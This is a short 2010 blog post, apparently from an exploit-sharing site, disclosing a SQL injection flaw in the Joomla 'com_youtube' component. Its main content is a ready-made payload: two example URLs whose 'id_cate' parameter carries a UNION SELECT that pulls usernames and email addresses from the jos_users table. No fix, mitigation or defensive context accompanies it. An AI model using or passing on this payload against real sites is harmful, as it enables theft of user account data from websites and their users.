Joomla [com_youtube] Sql Injection Vulnerability ~ Zer0-0ne

Sunday, July 25, 2010

Joomla [com_youtube] Sql Injection Vulnerability

# Exploit Title: Joomla "com_youtube" Sql Injection Vulnerability
# Date: 2010-07-24
# Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr
----------------------------------------------------------------------------------------------------
===[ Exploit ]===
http://www.site.com/index.php?option=com_youtube&id_cate=4

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--
or
http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

Zer0-0ne

Sunday, July 25, 2010

Joomla [com_youtube] Sql Injection Vulnerability

0 comments:

Post a Comment

About Me

Blog Archive

Popular Posts

Categories

Featured Posts